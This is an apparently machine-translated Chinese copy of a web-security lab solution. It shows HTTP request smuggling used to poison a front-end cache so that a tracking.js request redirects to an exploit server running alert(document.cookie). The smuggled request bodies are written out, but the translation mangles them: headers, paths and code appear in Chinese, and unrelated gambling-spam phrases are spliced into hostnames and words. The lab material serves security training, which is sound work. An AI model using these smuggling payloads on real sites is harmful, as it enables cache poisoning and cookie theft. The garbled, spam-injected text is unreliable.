实验室:利用HTTP请求走私以执行网络缓存中毒beplay体育能用吗
专家
该实验室涉及前端和后端服务器,并且前端服务器不支持块状编码。前端服务器配置为缓存某些响应。
要解决实验室,请执行导致缓存中毒的请求走私攻击,以便随后对JavaScript文件的请求接收到Exploit Server的重定向。中毒的缓存应警报document.cookie
。
笔记
实验室模拟受害者用户的活动。您向实验室提出的每几个帖子请求,受害者用户都会提出自己的请求。您可能需要几次重复攻击,以确保受害者用户的要求根据需要出现。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。
解决方案
打开博客文章,单击“下一篇文章”,然后尝试使用其他主机标头将结果请求走私:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-Length:129传输编码:块0 get/post/post/next?postID = 3 http/1.1主机:任何内容类型:应用程序/x-www-form-urlencoded内容长度:10 x = 1
- 观察您可以使用此请求将下一个请求重定向到网站beplay体育能用吗
/邮政
在您的选择中。
转到您的利用服务器,并创建一个文本/JavaScript
文件为/邮政
与内容:
警报(Document.Cookie)
首先使用利用服务器的主机名首先重新启动先前的攻击,如下所示:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-Length:193传输编码:块0 get/post/post/next?postID = 3 http/1.1主机:your-exploit-server-hostname.webeplay体育能用吗b-security-academy.net content-type:application/x-www-form-urlencoded content content content:10 x = 1 = 1
然后获取/resources/js/tracking.js
通过发送以下请求:
get/resources/js/tracking.js http/1.1主机:lab-id.web-securibeplay体育能用吗ty-academy.net连接:关闭
如果攻击成功,对跟踪
请求应重定向到您的利用服务器。
- 确认缓存已通过重复请求中毒
跟踪
几次,并确认您每次都会收到重定向。
笔记
在攻击成功之前,您可能需要重复几次帖子/获取过程。
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)